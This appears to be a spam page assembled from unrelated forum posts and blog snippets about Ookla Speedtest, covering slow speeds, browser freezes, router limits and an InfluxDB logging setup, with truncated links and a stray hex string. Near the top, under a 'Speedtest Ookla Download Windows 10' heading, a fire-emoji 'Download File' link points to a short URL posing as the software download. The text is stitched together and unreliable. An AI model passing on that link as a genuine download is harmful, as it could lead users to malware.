I need to copy Ookla Speedtest.exe CLI to System32 for multiple systems, I setup the below Worklet script but it doesnt seem to work. Am I missing something to do with permissions when copying over files to the system32 folder which always requires Admin priveleges as we all know. Not sure how to get around this if it is the case. I have the speedtest.exe also uploaded to the Policy too. Any ideas will be much appreciated.

I quickly found this blog by Simon Hearne -speedtest-influx/ about running speedtest on a Raspberry Pi and capturing the results in InfluxDB. This blog gave me a lot of information on the potential solution, but I had some issues with implementing it.

Speedtest Ookla Download Windows 10

Download File 🔥 https://shoxet.com/2y5H8I 🔥

Since the data provided by the Ookla Speedtest is the core of this application, we can start there. Rather than install the standard GUI speedtest, we are going to install the Ookla Speedtest CLI (Command Line Interface).

InfluxDB is used to store the values gathered by the speedtest cli. The process for installing InfluxDB described here -to-install-influxdb-on-windows-in-2019/ was pretty easy to follow. I just needed to make some tweaks to make it ready for recording speedtest results.

Assuming the service is started and running, you are now automatically collecting the speedtest results every 15 minutes and storing the data into the InfluxDB database speedtest_db .

It first started with me loading up speedtest.net for a quick test....

I actually almost finished the test but it froze my screen right at the end of the test and i had to hold the power down for 5 seconds.

After that, i went BACK into speed test after a reboot and it happened instantly.

Now, no matter what, it freezes instantly when i go to speedtest.net

I am using the latest version of chrome on windows 8.1 Pro with all the latest run times and drivers.

Specs are in sig and a video is soon to come.

(i'd do it right now but i'd lose this post...)

Try another browser, if that works then it might be an extension or something that is conflicting with the website and how it does the speedtests. I think speedtest.net uses flash for it, so maybe there is a bug happening?

Okay, I tried internet explorer, firefox, and safari.

All of them do it consistently.

And to the people saying "Don't use speedtest", i am not going to ignore a problem so big that it crashes my whole computer.

If you don't have anything other than "Don't do it then", don't bother posting.


If I use the app or the cli the upload speeds over seas are all fast and good. But if I use any web browser in windows going to the speedtest.net website, the upload speed on overseas servers is just slow. This is a known problem with windows.

Back in 2016, Microsoft quietly added a new feature to its Bing search engine. It let users test the speeds of their internet connection just by typing in "speedtest" in the search box. A widget would then appear that, when activated, would offer info on the download and upload speeds of their current ISP, along with the amount of latency with that connection.

As with Microsoft's own speed test, Bing website visitors just have to type in "speedtest" or "speed test" to bring up the Ookla-powered widget on the page. Then all you have to do is click on the "Start" button on the page. The Ookla speed test will then begin.

I just moved into a new place and bought a CAX30 modem/router to go with my new gigabit internet plan. When I run a speedtest directly on the router I usually see around 700-800mbs which ins't quite the 940 I'm paying for but I haven't even made it to that bridge to cross it yet. I have my PC hardwired into my router via CAT6 cable and the highest speed I have managed to measure on my PC is consistently around 250mbs. I have tried hardwiring several other devices into the router as well, all with similar results. Consistently around 250mbs. I feel like I have pretty well confirmed the issue isn't on my PC side and I spent some time on the phone with Cox verifying the issue wasn't on their side. The fact that I see these high speeds on the router but not on any of my devices seem to confirm that. 

I'm pulling my hair out here, I cannot figure out why I can't get these speeds on my devices. 


Changing the connection settings made no difference. Using fast.com with Firefox yesterday showed an upload speed of several Mbps while speedtest.net showed 0.00bbps. This morning speedtest.net still showed an upload speed of 0.00. The internet is very slow this morning with a download speed of only 1-2Mbps. fast.com did not work at all first time, but showed PR_END_OF_FILE_ERROR. Second time fast.com showed download 700Kbps and upload 4Kbps. Edge was similar, though fast.com took a long time to show an upload figure.It seems my problem is very slow internet at peak times. I shall mark this problem as solved, as it is not Firefox.

I assume with the "speed" windows tells you about, you mean the entry in the Connection Status, which you can see by going to Network and Sharing Center and clicking on the connection. That speed is the current maximum speed to talk to the component you are directly connected to. In my experience that speed is extremely optimistic for WiFi connections. Actual transfer rates can easily be less by a factor 10. This is normal. I don't actually know for certain why this happens, but I assume the reported speed is the maximum rate at which data is sent, and what we see is the effect of packet loss, and the TCP overhead to resolve packet loss - someone might come along and provide the actual reason with sources.

Speedtest is an application that measures the latency, jitter, packet loss, download bandwidth, and upload bandwidth of the network connection between the client and a nearby Speedtest Server. By now, Speedtest by Ookla is ubiquitous on all platform that has internet connections. Whether you are on Windows, Mac, Linux, iOS, Android or ChromeOS you can find a way to test your internet speed with speedtest by Ookla.

I've created an ANY hole and am doing speedtests through it. Plugged in to the T20, I'll see around 300-310Mbps on the cable connection. If I do a speedtest directly from the back of the cable modem, I'll reach around 770Mbps. As I've read through some other forum posts, I understand that the T20 will have some limitations on how much traffic it's able to process. I'd clearly like it to be more, but understand I'm at the upper limit of the T20 (I think).

I have a T20, currently running V12.9 U1.

I have a WG wifi 6 AP - AP 330, and the throughput from it is very good - it reaches or exceeds my supposedly current max cable download of 300 Mbps, and was what I used for my earlier throughput tests when I had a 600 Mbps cable connection service which got near the stated speeds.

This is using the Windows Speedtest by Ookla app.

Their web site test (www.speedtest.net) shows a similar download speed for me > 300 Mbps.

Using a Ethernet cable, I'm getting over 450 Mbps, which shows that my cable company has upgraded my service, gratis.

I am using failover on the multi-wan. I have also created 2 policies: 1 is cable fails to dsl, and the other is dsl fails to cable. I route some packets out on the DSL first, things like SMTP / IMAP / DNS / NTP. I figure I might as well use the pipe since it's there and move some traffic off the cable connection. The latency on the cable modem to my local speedtest.net site is 18-19ms on both DSL and cable.

What can I do if I'm not getting the speed I pay for? If results from FAST.com and other internet speed tests (like dslreports.com or speedtest.net) often show less speed than you have paid for, you can ask your ISP about the results.

Here is where things get weird. These test are made directly on the server, but is constant across the network. Customer can pull up speedtest.net in Firefox, run a speed test and gets his full package (25/3). Customer can not pull up almost any other web page. Voip service does not work. After a few minutes, full internet activity and voip is restored for 15-30 seconds, then it all dies again for quite a while (except speedtest.net). Windows pc's work as expected when connected directly to Force 200.

If you are prepared to share trace data, then I would be happy to look at it. There are a few threads where posters have agreed to share data (two that I could quickly find are -us/answers/questions/330172/extreamly-slow-upload-speed-in-windows-all-other-o.html and -us/answers/questions/390860/remote-connections-speed-limited-to-about-15-mb-s.html).

2: Don't speed test with Google Chrome. If your computer isn't the fastest, or if you have a mechanical hard drive, Chrome has the tendency to cause speed tests to under-report due to bottlenecks in storage, as odd as that sounds. Instead, on a Windows 8 or better computer (or a Mac if you have one) use the Ookla speedtest.net app available from the Microsoft Store, or the Apple App Store. This does not have the same performance problem that a browser may have. Ookla even suggests using this app if you have a fast connection like Gigabit.

I noticed my speeds are not what they should be testing on computer I called verizon and they told me to go to www.verizon.com/speedtest and run the test since they said that speedtest.net is not there and not accurate and not affiliated with them! so i did and i failed almost every time and not only failed the tests it bumped me off the internet on my computer ( not wifi just computer) when windows ran the diagnostic it says gateway not found and windows fixes the problem right away. this happens 95% of the time sometimes i get up to the router test and fail. but even getting this far where is says my router is very close to the gig speeds my dl on my computer is only at 190-200 dl and 300-400 upload. 17dc91bb1f

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